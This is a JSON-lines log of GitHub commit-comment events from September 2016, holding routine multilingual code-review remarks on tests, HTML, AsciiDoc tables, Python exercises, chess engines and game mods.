{"id":"4576544368","type":"CommitCommentEvent","actor":{"login":"vinniefalco"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":19060784,"position":39,"line":67,"path":"src/test/basics/Buffer_test.cpp","commit_id":"4c5cfb9a443dda5f68e87b162045fb5dff186e42","created_at":"2016-09-16T21:48:57Z","updated_at":"2016-09-16T21:48:57Z","body":"This is pure noise because we already did these checks for `b0`"}},"created_at":"2016-09-16T21:48:57Z"}
{"id":"4576544892","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/edispatcher"},"payload":{"comment":{"id":19060785,"position":3,"line":3,"path":"app/views/common/_footer.html.erb","commit_id":"f2795289241e9d53767ea051123bb159acc6d52e","created_at":"2016-09-16T21:49:05Z","updated_at":"2016-09-16T21:49:05Z","body":"Хорошо бы чтобы ссылка открывалась в новой вкладке браузера."}},"created_at":"2016-09-16T21:49:05Z"}
{"id":"4576546759","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19060788,"position":null,"line":null,"path":null,"commit_id":"263a9efd9bdb6421badcba2517d1052b3a4d025b","created_at":"2016-09-16T21:49:32Z","updated_at":"2016-09-16T21:49:32Z","body":"Or pos.rule50_count() - thisThread->rootPos.rule50_count() ..."}},"created_at":"2016-09-16T21:49:32Z"}
{"id":"4576549320","type":"CommitCommentEvent","actor":{"login":"mattstratton"},"repo":{"name":"arresteddevops/ado-hugo"},"payload":{"comment":{"id":19060793,"position":null,"line":null,"path":null,"commit_id":"4d974ff28784b9867286bb26663671dacd8ced3a","created_at":"2016-09-16T21:50:14Z","updated_at":"2016-09-16T21:50:14Z","body":"FYi, this has implications in the feed, because I add the episode number there by hand\r\n\r\nhttps://github.com/arresteddevops/ado-hugo/blob/master/themes/ado/layouts/rss.xml#L34"}},"created_at":"2016-09-16T21:50:14Z"}
{"id":"4576549737","type":"CommitCommentEvent","actor":{"login":"absprague"},"repo":{"name":"lollar/21_card_trick"},"payload":{"comment":{"id":19060796,"position":null,"line":null,"path":null,"commit_id":"10c207ddc95c81a7af5579b6459e435b35a1660a","created_at":"2016-09-16T21:50:21Z","updated_at":"2016-09-16T21:50:21Z","body":"I just realized this is an older version I was working with this morning, and doesn't have the options to select the column from the console in this version. I also just tested that version and it still has a couple of bugs, so I will try to fix them before I upload the newer version. "}},"created_at":"2016-09-16T21:50:21Z"}
{"id":"4576550776","type":"CommitCommentEvent","actor":{"login":"mattstratton"},"repo":{"name":"arresteddevops/ado-hugo"},"payload":{"comment":{"id":19060798,"position":null,"line":null,"path":null,"commit_id":"4d974ff28784b9867286bb26663671dacd8ced3a","created_at":"2016-09-16T21:50:37Z","updated_at":"2016-09-16T21:50:37Z","body":"Never mind, I'm stupid. This is just where they are displayed. Ignore me."}},"created_at":"2016-09-16T21:50:37Z"}
{"id":"4576559895","type":"CommitCommentEvent","actor":{"login":"leolenda1001"},"repo":{"name":"leolenda1001/100-zueira"},"payload":{"comment":{"id":19060821,"position":null,"line":null,"path":null,"commit_id":"7e49c3f8a17e41841a14f0de7dd44d090681e808","created_at":"2016-09-16T21:52:54Z","updated_at":"2016-09-16T21:52:54Z","body":"bom dia boa tarde boa noite dog belga"}},"created_at":"2016-09-16T21:52:54Z"}
{"id":"4576560123","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/edispatcher"},"payload":{"comment":{"id":19060822,"position":null,"line":null,"path":null,"commit_id":"f2795289241e9d53767ea051123bb159acc6d52e","created_at":"2016-09-16T21:52:57Z","updated_at":"2016-09-16T21:52:57Z","body":"Почему бы не вынести ошибки в отдельный фрагмент в каталог `common`:\r\n\r\nhttps://github.com/balashovmb/edispatcher/blob/master/app/views/routes/_form.html.erb#L2"}},"created_at":"2016-09-16T21:52:57Z"}
{"id":"4576561151","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19060823,"position":176,"line":458,"path":"src/navigation/deep-linker.ts","commit_id":"4236d57ad8c477738cd9844923d4e965eb14c1b0","created_at":"2016-09-16T21:53:12Z","updated_at":"2016-09-16T21:53:12Z","body":"I think that is @private ;)"}},"created_at":"2016-09-16T21:53:12Z"}
{"id":"4576562980","type":"CommitCommentEvent","actor":{"login":"autarch"},"repo":{"name":"moose/Moose"},"payload":{"comment":{"id":19060829,"position":7,"line":452,"path":"lib/Moose.pm","commit_id":"49c318df621c749e9018200d08643ceefcb91387","created_at":"2016-09-16T21:53:44Z","updated_at":"2016-09-16T21:53:44Z","body":"I'm not sure I follow the second half of your comment, \"suggesting Moose can them recognize the conflict in compile time.\""}},"created_at":"2016-09-16T21:53:44Z"}
{"id":"4576565844","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/edispatcher"},"payload":{"comment":{"id":19060834,"position":6,"line":21,"path":"app/views/trains/_form.html.erb","commit_id":"f2795289241e9d53767ea051123bb159acc6d52e","created_at":"2016-09-16T21:54:32Z","updated_at":"2016-09-16T21:54:32Z","body":"Хорошо бы добавить пустой вариант, чтобы можно было снять поезд с маршрута."}},"created_at":"2016-09-16T21:54:32Z"}
{"id":"4576566394","type":"CommitCommentEvent","actor":{"login":"m57tonio"},"repo":{"name":"cufa24/proy-githut"},"payload":{"comment":{"id":19060836,"position":null,"line":null,"path":null,"commit_id":"2caf8b95f5c699dcb00b38749a1f46909b9d82b7","created_at":"2016-09-16T21:54:41Z","updated_at":"2016-09-16T21:54:41Z","body":"cambios"}},"created_at":"2016-09-16T21:54:41Z"}
{"id":"4576567119","type":"CommitCommentEvent","actor":{"login":"ximinez"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":19060837,"position":39,"line":67,"path":"src/test/basics/Buffer_test.cpp","commit_id":"4c5cfb9a443dda5f68e87b162045fb5dff186e42","created_at":"2016-09-16T21:54:53Z","updated_at":"2016-09-16T21:54:53Z","body":"Disagree. The default ctor is an entirely different code path than the `(size_t)` ctor, even if the value is 0. This check ensures both do the right thing."}},"created_at":"2016-09-16T21:54:53Z"}
{"id":"4576567125","type":"CommitCommentEvent","actor":{"login":"tshemsedinov"},"repo":{"name":"HowProgrammingWorks/Letters"},"payload":{"comment":{"id":19060838,"position":null,"line":null,"path":null,"commit_id":"341ca8b42820056eaee4367bc4c0739df9b9f4ff","created_at":"2016-09-16T21:54:53Z","updated_at":"2016-09-16T21:54:53Z","body":"@hrenillo да, если есть желание, приходите http://rozklad.kpi.ua/Schedules/ViewSchedule.aspx?v=54c094fe-fc37-4766-b7f3-d8af303cb843 а о специальных лекциях я буду сообщать в группах http://www.meetup.com/KievNodeJS/ и http://www.meetup.com/NodeUA/"}},"created_at":"2016-09-16T21:54:53Z"}
{"id":"4576567321","type":"CommitCommentEvent","actor":{"login":"m57tonio"},"repo":{"name":"cufa24/proy-githut"},"payload":{"comment":{"id":19060842,"position":null,"line":null,"path":null,"commit_id":"2caf8b95f5c699dcb00b38749a1f46909b9d82b7","created_at":"2016-09-16T21:54:56Z","updated_at":"2016-09-16T21:54:56Z","body":"se realizo los camobio"}},"created_at":"2016-09-16T21:54:56Z"}
{"id":"4576569633","type":"CommitCommentEvent","actor":{"login":"mojavelinux"},"repo":{"name":"mulesoft/mulesoft-docs"},"payload":{"comment":{"id":19060848,"position":14,"line":12,"path":"release-notes/v/latest/hdfs-connector-release-notes.adoc","commit_id":"2dd8aaedcc85e6c75221f952cb2fa92f750878d1","created_at":"2016-09-16T21:55:32Z","updated_at":"2016-09-16T21:55:32Z","body":"@sharkberto I'm still seeing cases of `cols=\",\"` in the new commits. This pattern needs to be eradicated."}},"created_at":"2016-09-16T21:55:32Z"}
{"id":"4576572666","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/an_final_project"},"payload":{"comment":{"id":19060853,"position":25,"line":25,"path":"index.html","commit_id":"8537b763623d48e4f815f215ff4c59fa133ab521","created_at":"2016-09-16T21:56:21Z","updated_at":"2016-09-16T21:56:21Z","body":"I would suggest having a single <section> element, perhaps <section id=\"timeline\">.  Then, instead of wrapping each \"blurb\" in their own <section class=\"main\"> and their own <div class=\"blurb\"> element, you could just have them in their own <div class=\"blurb\"> ...as you do now.  "}},"created_at":"2016-09-16T21:56:21Z"}
{"id":"4576573503","type":"CommitCommentEvent","actor":{"login":"emailweixu"},"repo":{"name":"baidu/Paddle"},"payload":{"comment":{"id":19060855,"position":null,"line":null,"path":null,"commit_id":"aeb2d848d09b8b7529c6f749a9f543b02b8051c1","created_at":"2016-09-16T21:56:34Z","updated_at":"2016-09-16T21:56:34Z","body":"It's strange that somehow the continuous integration server's gcc 4.8.4 and my own gcc 5.4.0 can pass."}},"created_at":"2016-09-16T21:56:34Z"}
{"id":"4576573563","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"echin6/dsp"},"payload":{"comment":{"id":19060856,"position":null,"line":null,"path":null,"commit_id":"73e9a483d3cd321fe1f8919f3554debb24073c99","created_at":"2016-09-16T21:56:35Z","updated_at":"2016-09-16T21:56:35Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello again @echin6\r\n\r\nI just realized something about your function `front_x(words)`... If you set `words=['xa', 'ax', 'aa']`, it will return `['xa', 'ax', 'aa']`, instead of `['xa', 'aa', 'ax']`. Words that don't start with an x should be ordered according to the usual alphabet, not an alphabet where `x` comes before `a`!\r\n\r\nCheers!"}},"created_at":"2016-09-16T21:56:35Z"}
{"id":"4576573714","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/an_final_project"},"payload":{"comment":{"id":19060858,"position":16,"line":16,"path":"index.html","commit_id":"8537b763623d48e4f815f215ff4c59fa133ab521","created_at":"2016-09-16T21:56:37Z","updated_at":"2016-09-16T21:56:37Z","body":"I would suggest you use an <h1> here instead of <h3>"}},"created_at":"2016-09-16T21:56:37Z"}
{"id":"4576574118","type":"CommitCommentEvent","actor":{"login":"vinniefalco"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":19060859,"position":39,"line":67,"path":"src/test/basics/Buffer_test.cpp","commit_id":"4c5cfb9a443dda5f68e87b162045fb5dff186e42","created_at":"2016-09-16T21:56:44Z","updated_at":"2016-09-16T21:56:44Z","body":"Oh...I see"}},"created_at":"2016-09-16T21:56:44Z"}
{"id":"4576574209","type":"CommitCommentEvent","actor":{"login":"mrquincle"},"repo":{"name":"crownstone/bluenet"},"payload":{"comment":{"id":19060860,"position":null,"line":null,"path":null,"commit_id":"a9029b8548b9ca680b622b6b0498f07f00ab336c","created_at":"2016-09-16T21:56:45Z","updated_at":"2016-09-16T21:56:45Z","body":"Ah, I thought I had re-reverted it, but apparently I didn't. The current file should be according to your polarity. I also introduced a couple of other smaller improvements in my [latest commit](https://github.com/crownstone/bluenet/commit/3c18787a0c170201aba9ed8d61aa3b1b0be7bba2)."}},"created_at":"2016-09-16T21:56:45Z"}
{"id":"4576576689","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"secretagentan/an_final_project"},"payload":{"comment":{"id":19060864,"position":36,"line":36,"path":"index.html","commit_id":"8537b763623d48e4f815f215ff4c59fa133ab521","created_at":"2016-09-16T21:57:25Z","updated_at":"2016-09-16T21:57:25Z","body":"Because of my suggestion to change the <h3> at the top to <h1>, I suggest using <h2> and <h3> in these blurbs instead of <h1> and <h2> s..to convey the proper hierarchy "}},"created_at":"2016-09-16T21:57:25Z"}
{"id":"4576577163","type":"CommitCommentEvent","actor":{"login":"fireshoes"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":19060865,"position":null,"line":null,"path":null,"commit_id":"1327279fc11ac00344250bc5be9490b975a6c984","created_at":"2016-09-16T21:57:32Z","updated_at":"2016-09-16T21:57:32Z","body":"Make sure to use gen-card.pl in the Utils folder to generate cards. It will add comments for each ability, automatically add simple abilities, card name, rarity, type, subtype, number, and power/toughness."}},"created_at":"2016-09-16T21:57:32Z"}
{"id":"4576581617","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/edispatcher"},"payload":{"comment":{"id":19060880,"position":18,"line":22,"path":"app/views/routes/show.html.erb","commit_id":"f2795289241e9d53767ea051123bb159acc6d52e","created_at":"2016-09-16T21:58:41Z","updated_at":"2016-09-16T21:58:41Z","body":"Для вывода списка поездов (и других подобных случаев) можно было бы создать отдельный фрагмент: `app/views/trains/_train_item.html.erb`, `app/views/trains/_train_list_item.html.erb` или что-то подобное."}},"created_at":"2016-09-16T21:58:41Z"}
{"id":"4576584266","type":"CommitCommentEvent","actor":{"login":"joaquimrocha"},"repo":{"name":"endlessm/gnome-software"},"payload":{"comment":{"id":19060883,"position":3,"line":782,"path":"src/plugins/gs-plugin-appstream.c","commit_id":"fc39f4f7320887a8844329095347149aae446ad3","created_at":"2016-09-16T21:59:23Z","updated_at":"2016-09-16T21:59:23Z","body":"Which two lines, the ones added in this patch or the quirk and adding to the list?\r\nIn any case I don't see why that would solve anything. Can you elaborate?"}},"created_at":"2016-09-16T21:59:23Z"}
{"id":"4576585792","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":19060886,"position":13,"line":25,"path":".github/ISSUE_TEMPLATE.MD","commit_id":"c1e90a8faff1b6398efa35f335d3b801099ed26b","created_at":"2016-09-16T21:59:46Z","updated_at":"2016-09-16T21:59:46Z","body":"Italian is a wonderful language, sorry xD"}},"created_at":"2016-09-16T21:59:46Z"}
{"id":"4576586692","type":"CommitCommentEvent","actor":{"login":"royherzel"},"repo":{"name":"royherzel/podtunes"},"payload":{"comment":{"id":19060887,"position":null,"line":null,"path":null,"commit_id":"d1025f1598901c91f07e050909410134ec46861e","created_at":"2016-09-16T22:00:01Z","updated_at":"2016-09-16T22:00:01Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;3EsRobc7&#x2F;1-first-pull\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> First Pull</a>"}},"created_at":"2016-09-16T22:00:01Z"}
{"id":"4576588365","type":"CommitCommentEvent","actor":{"login":"mojavelinux"},"repo":{"name":"mulesoft/mulesoft-docs"},"payload":{"comment":{"id":19060890,"position":5,"line":18,"path":"mule-user-guide/v/3.8/hdfs-apidoc.adoc","commit_id":"a7881aab1b09b0b8f1afc0fdcafd752bbc22a4f6","created_at":"2016-09-16T22:00:24Z","updated_at":"2016-09-16T22:00:24Z","body":"@sharkberto We should stop using % units in the cols attribute. These values are ratios, not percentages. The width should always have a percentage unit (and preferably no surrounding quotes). Finally, the number of delimiters for a table block should always be 4. In other words, this table should be written as:\r\n\r\n```\r\n[%header,cols=\"60,^40\",width=50%]\r\n|===\r\n...\r\n|===\r\n```\r\n\r\nThere was no reason for alignment in front of 60 in this case since left alignment is the default."}},"created_at":"2016-09-16T22:00:24Z"}
{"id":"4576589920","type":"CommitCommentEvent","actor":{"login":"captnjameskirk"},"repo":{"name":"Homebrew/homebrew-science"},"payload":{"comment":{"id":19060896,"position":7,"line":4,"path":"hdf5.rb","commit_id":"86b035236ea4d467f31925b16b78fbb884636be0","created_at":"2016-09-16T22:00:45Z","updated_at":"2016-09-16T22:00:45Z","body":"This URL is no longer valid. It is: \"https://support.hdfgroup.org/ftp/HDF5/releases/hdf5-1.8.17/src/hdf5-1.8.17.tar.bz2\""}},"created_at":"2016-09-16T22:00:45Z"}
{"id":"4576591892","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/manifest"},"payload":{"comment":{"id":19060898,"position":null,"line":null,"path":null,"commit_id":"12c43d0adefaf55bef0176c9210c7138b0fe595c","created_at":"2016-09-16T22:01:16Z","updated_at":"2016-09-16T22:01:16Z","body":"Thanks "}},"created_at":"2016-09-16T22:01:16Z"}
{"id":"4576592158","type":"CommitCommentEvent","actor":{"login":"mojavelinux"},"repo":{"name":"mulesoft/mulesoft-docs"},"payload":{"comment":{"id":19060901,"position":5,"line":18,"path":"mule-user-guide/v/3.8/hdfs-apidoc.adoc","commit_id":"a7881aab1b09b0b8f1afc0fdcafd752bbc22a4f6","created_at":"2016-09-16T22:01:20Z","updated_at":"2016-09-16T22:01:20Z","body":"In general, I'd say the table settings are just being over-configured. It should save a lot of time for writers if they try to do less configuration in general."}},"created_at":"2016-09-16T22:01:20Z"}
{"id":"4576594275","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":19060906,"position":13,"line":25,"path":".github/ISSUE_TEMPLATE.MD","commit_id":"c1e90a8faff1b6398efa35f335d3b801099ed26b","created_at":"2016-09-16T22:01:56Z","updated_at":"2016-09-16T22:01:56Z","body":"Other way around, `sensible` in English eventually shifted to have a very weird meaning :P. Nothing to be sorry about. :)"}},"created_at":"2016-09-16T22:01:56Z"}
{"id":"4576597957","type":"CommitCommentEvent","actor":{"login":"kbtbc"},"repo":{"name":"MangoScango/PokemonGo-Map"},"payload":{"comment":{"id":19060915,"position":null,"line":null,"path":null,"commit_id":"9e3b998723d5f83100559b7134fb7a0a40ebdfa9","created_at":"2016-09-16T22:02:38Z","updated_at":"2016-09-16T22:02:38Z","body":"Mango, I'm trying to run 'lures and ivs' in my own branch.  I copied your code.  It's getting the IVs, but entirely skipping over the lured pokestops when they are lured ... so the 'lured' part doesn't seem to be working?"}},"created_at":"2016-09-16T22:02:38Z"}
{"id":"4576602819","type":"CommitCommentEvent","actor":{"login":"christopherthielen"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19060925,"position":19,"line":19,"path":"packages/ng1-bower/webpack.config.js","commit_id":"3a1160d30cad275af9eb5c9e5142714b974123e6","created_at":"2016-09-16T22:03:54Z","updated_at":"2016-09-16T22:03:54Z","body":"I've never tried multiple apps on the same page. If you can make a plunker\nthat demonstrates I could look into it though.\nOn Thu, Sep 15, 2016 at 8:46 PM Justin Early <notifications@github.com>\nwrote:\n\n> Can you do this with multiple ng-apps on one page?\n> I am running into issues with multiple ng apps on same page. Where the\n> injector is from the last app and templateCache and $rootScope is not the\n> one I want.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/angular-ui/ui-router/commit/3a1160d30cad275af9eb5c9e5142714b974123e6#commitcomment-19047422>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB9VZr3vsNv8D-lfxIFOxmYnCAGBcO5qks5qqfT_gaJpZM4J8Qz2>\n> .\n>\n"}},"created_at":"2016-09-16T22:03:54Z"}
{"id":"4576604293","type":"CommitCommentEvent","actor":{"login":"DeinFreund"},"repo":{"name":"springweblobby/swl-website"},"payload":{"comment":{"id":19060926,"position":null,"line":null,"path":null,"commit_id":"928ff5e50bcfbbed16204eefb8f26d05a44e10e1","created_at":"2016-09-16T22:04:17Z","updated_at":"2016-09-16T22:04:17Z","body":"engineception"}},"created_at":"2016-09-16T22:04:17Z"}
{"id":"4576605502","type":"CommitCommentEvent","actor":{"login":"rgeorgeoff"},"repo":{"name":"rgeorgeoff/couchbase-jvm-core"},"payload":{"comment":{"id":19060931,"position":1,"line":418,"path":"pom.xml","commit_id":"3da4f6fb4af8a4dca7f46ef3fc64269af0689924","created_at":"2016-09-16T22:04:36Z","updated_at":"2016-09-16T22:04:36Z","body":"this already says 1.3.4-snapshot though (btw)"}},"created_at":"2016-09-16T22:04:36Z"}
{"id":"4576606118","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"choiboy9106/dsp"},"payload":{"comment":{"id":19060933,"position":null,"line":null,"path":null,"commit_id":"a71e4b696dda5819d46ebf3d7048292784ab250e","created_at":"2016-09-16T22:04:44Z","updated_at":"2016-09-16T22:04:44Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @choiboy9106 \r\n\r\nNice Python work! Here are some comments:\r\n- For Q6, function `donuts`, at line 25 you want `if count >= 10`.\r\n- For Q6, function `both_ends`, at line 50 you want `return s[:2]+s[-2:]` (check with the examples).\r\n- For Q6, function `front_back` is not working properly. First, x and y are not integers, as required to slice a string, and second, `len(a)/2` and `len(b)/2` are integer divisions, making the `math.ceil` function ineffective.\r\n- For Q7, function `linear_merge` sorts the combined list1+list2 and does not take advantage of the fact that, separately, list1 and list2 are already sorted. With n the length of the list, you can improve time complexity from O(n*log(n)) to O(n) by using this fact.\r\n\r\n👍 "}},"created_at":"2016-09-16T22:04:44Z"}
{"id":"4576609564","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"nirvananoob/leetcode"},"payload":{"comment":{"id":19060936,"position":85,"line":85,"path":"java/DP/monkey_accross_river.java","commit_id":"edec503c83368dcf22db2ebe6f13ee9dc09895a9","created_at":"2016-09-16T22:05:35Z","updated_at":"2016-09-16T22:05:35Z","body":"无敌。\r\n@puchai"}},"created_at":"2016-09-16T22:05:35Z"}
{"id":"4576609674","type":"CommitCommentEvent","actor":{"login":"mgmhunt"},"repo":{"name":"uFrame/DocumentSiteBuilder"},"payload":{"comment":{"id":19060937,"position":null,"line":null,"path":null,"commit_id":"bcd72b6efa600519e313d143c6bcbbebcd194615","created_at":"2016-09-16T22:05:36Z","updated_at":"2016-09-16T22:05:36Z","body":"Not sure whats going on with that last line, didn't touch it?!"}},"created_at":"2016-09-16T22:05:36Z"}
{"id":"4576617219","type":"CommitCommentEvent","actor":{"login":"sshintani"},"repo":{"name":"sshintani/Family-Visitation-and-Scheduling"},"payload":{"comment":{"id":19060956,"position":2,"line":2,"path":"README.md","commit_id":"0052c395fccd4e1e215e647802c81ea8f1ff97b3","created_at":"2016-09-16T22:07:41Z","updated_at":"2016-09-16T22:07:41Z","body":"URL will be taken down within two weeks of challenge"}},"created_at":"2016-09-16T22:07:41Z"}
{"id":"4576619202","type":"CommitCommentEvent","actor":{"login":"aroxby"},"repo":{"name":"ZombieRoxtar/LxssLoader"},"payload":{"comment":{"id":19060961,"position":124,"line":124,"path":"LxssLoader/main.cpp","commit_id":"4cc84b9d2e1e5ce14f1e74b6f0cc467cae185b60","created_at":"2016-09-16T22:08:15Z","updated_at":"2016-09-16T22:08:15Z","body":"\"Failed to launch the process\"?  Is there a retval?  Have you tried something like `python hello_world.py`?"}},"created_at":"2016-09-16T22:08:15Z"}
{"id":"4576622636","type":"CommitCommentEvent","actor":{"login":"mojavelinux"},"repo":{"name":"mulesoft/mulesoft-docs"},"payload":{"comment":{"id":19060968,"position":22,"line":18,"path":"release-notes/v/latest/servicenow-connector-release-notes.adoc","commit_id":"d57b11fba0fb7cc6e34c92966ebe2484d135458c","created_at":"2016-09-16T22:09:13Z","updated_at":"2016-09-16T22:09:13Z","body":"100a is not a valid width for a table. It should be `width=100%`, but there is no need to specify 100% width since that is the default.\r\n\r\nAlso, these columns don't need to be AsciiDoc table cells since they do not contain delimited blocks. The AsciiDoc table cells should be used only when necessary."}},"created_at":"2016-09-16T22:09:13Z"}
{"id":"4576624223","type":"CommitCommentEvent","actor":{"login":"Gabrielmsouza"},"repo":{"name":"Gabrielmsouza/GestaoDeContatos"},"payload":{"comment":{"id":19060974,"position":2,"line":2,"path":"README.md","commit_id":"4ad92827e581f9373707d8ee75344ff34ec3c939","created_at":"2016-09-16T22:09:38Z","updated_at":"2016-09-16T22:09:38Z","body":"O Software Gestão de Contatos é recomendado para uso pessoal ou de pequenas empresas que desejam ter um controle maior de seus contatos. Usando o software, você poderá abandonar o uso de agendas e anotações em papéis que você utiliza no dia-a-dia."}},"created_at":"2016-09-16T22:09:38Z"}
{"id":"4576624514","type":"CommitCommentEvent","actor":{"login":"ninaholic"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19060976,"position":null,"line":null,"path":null,"commit_id":"2a30cb97d45dbeb7a4009dcd92480b6b7b34aa5d","created_at":"2016-09-16T22:09:42Z","updated_at":"2016-09-16T22:09:42Z","body":"oh, I tried Tahr 6.0.5 on laptop with cd-rom drive and see what you mean now. whoops, universal is not so universal after all :laughing: yes I think removing the CD button/entry is ok with new layout"}},"created_at":"2016-09-16T22:09:42Z"}
{"id":"4576625995","type":"CommitCommentEvent","actor":{"login":"jdashg"},"repo":{"name":"kenrussell/WebGL"},"payload":{"comment":{"id":19060980,"position":null,"line":null,"path":null,"commit_id":"d4538b4ef099956093f6252d9f7b62a9d560a536","created_at":"2016-09-16T22:10:08Z","updated_at":"2016-09-16T22:10:08Z","body":"This is confusing wrt WEBGL_compressed_texture_etc1. 'ES3' was chosen because it captures ETC1, ETC2, and 'EAC' formats."}},"created_at":"2016-09-16T22:10:08Z"}
{"id":"4576626303","type":"CommitCommentEvent","actor":{"login":"AirwavesMan"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19060981,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T22:10:12Z","updated_at":"2016-09-16T22:10:12Z","body":"Ah ok, I thought something like that. I have no idea what we can do with tavi. The best fix was your first fix  but I see the other problem. Can we do a special fix for maps like taviana or namalsk ?"}},"created_at":"2016-09-16T22:10:12Z"}
{"id":"4576628270","type":"CommitCommentEvent","actor":{"login":"mojavelinux"},"repo":{"name":"mulesoft/mulesoft-docs"},"payload":{"comment":{"id":19060982,"position":11,"line":11,"path":"runtime-manager/v/latest/working-with-alerts.adoc","commit_id":"0b4a1c04295b88c428f95d99cd58469d000efbcd","created_at":"2016-09-16T22:10:46Z","updated_at":"2016-09-16T22:10:46Z","body":"code is not a valid block style. If there is no syntax highlighting needed, then this line can simply be removed."}},"created_at":"2016-09-16T22:10:46Z"}
{"id":"4576633996","type":"CommitCommentEvent","actor":{"login":"mojavelinux"},"repo":{"name":"mulesoft/mulesoft-docs"},"payload":{"comment":{"id":19060990,"position":2,"line":798,"path":"runtime-manager/v/latest/anypoint-platform-cli.adoc","commit_id":"dcff47d8c5630b082682caa3196fb1770872da63","created_at":"2016-09-16T22:12:26Z","updated_at":"2016-09-16T22:12:26Z","body":"Example is not a valid source language. If this block doesn't need source highlighting, then this line should just be removed."}},"created_at":"2016-09-16T22:12:26Z"}
{"id":"4576634632","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19060992,"position":null,"line":null,"path":null,"commit_id":"13627153888d3ac71645178a674491bc8151b8b6","created_at":"2016-09-16T22:12:38Z","updated_at":"2016-09-16T22:12:38Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-MacOS-10.9-clang: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-16T22:12:38Z"}
{"id":"4576638101","type":"CommitCommentEvent","actor":{"login":"ianfab"},"repo":{"name":"ddugovic/Stockfish"},"payload":{"comment":{"id":19061001,"position":null,"line":null,"path":null,"commit_id":"548ad02241e0b3ca2938e96ac9c63abf5fa87f06","created_at":"2016-09-16T22:13:38Z","updated_at":"2016-09-16T22:13:38Z","body":"This merge scores 0% against previous master in Antichess. Other regression tests are still running, but most of them are close to +-0 Elo, so it seems to be specific to Antichess. Possible causes are changes to\r\n\r\n- movepick\r\n- search\r\n- SEE (pinners)"}},"created_at":"2016-09-16T22:13:38Z"}
{"id":"4576639932","type":"CommitCommentEvent","actor":{"login":"ndavalos"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19061006,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T22:14:10Z","updated_at":"2016-09-16T22:14:10Z","body":"Honestly the fix you reverted worked great for the most part on Napf. I just had the one instance of ground swimming out of like 20 logins.\r\n\r\nA combination of no longer hiding the debug platform and the reverted fix will most likely solve 99% of the issues"}},"created_at":"2016-09-16T22:14:10Z"}
{"id":"4576644766","type":"CommitCommentEvent","actor":{"login":"kenrussell"},"repo":{"name":"kenrussell/WebGL"},"payload":{"comment":{"id":19061010,"position":null,"line":null,"path":null,"commit_id":"d4538b4ef099956093f6252d9f7b62a9d560a536","created_at":"2016-09-16T22:15:31Z","updated_at":"2016-09-16T22:15:31Z","body":"More texture compression formats are going to be added to later versions of ES3 as pointed out in https://github.com/KhronosGroup/WebGL/issues/2030#issuecomment-247486218 , so the _es3 suffix is ambiguous. Let's make some change here. Please suggest something. Either _etc, _etc2, _etc2_eac, or similar. There's already an _etc1 extension for WebGL and ETC2 is a superset of ETC1."}},"created_at":"2016-09-16T22:15:31Z"}
{"id":"4576648440","type":"CommitCommentEvent","actor":{"login":"ndavalos"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19061018,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T22:16:30Z","updated_at":"2016-09-16T22:16:30Z","body":"Maybe force some sort of switchmove in addition if you're not already?"}},"created_at":"2016-09-16T22:16:30Z"}
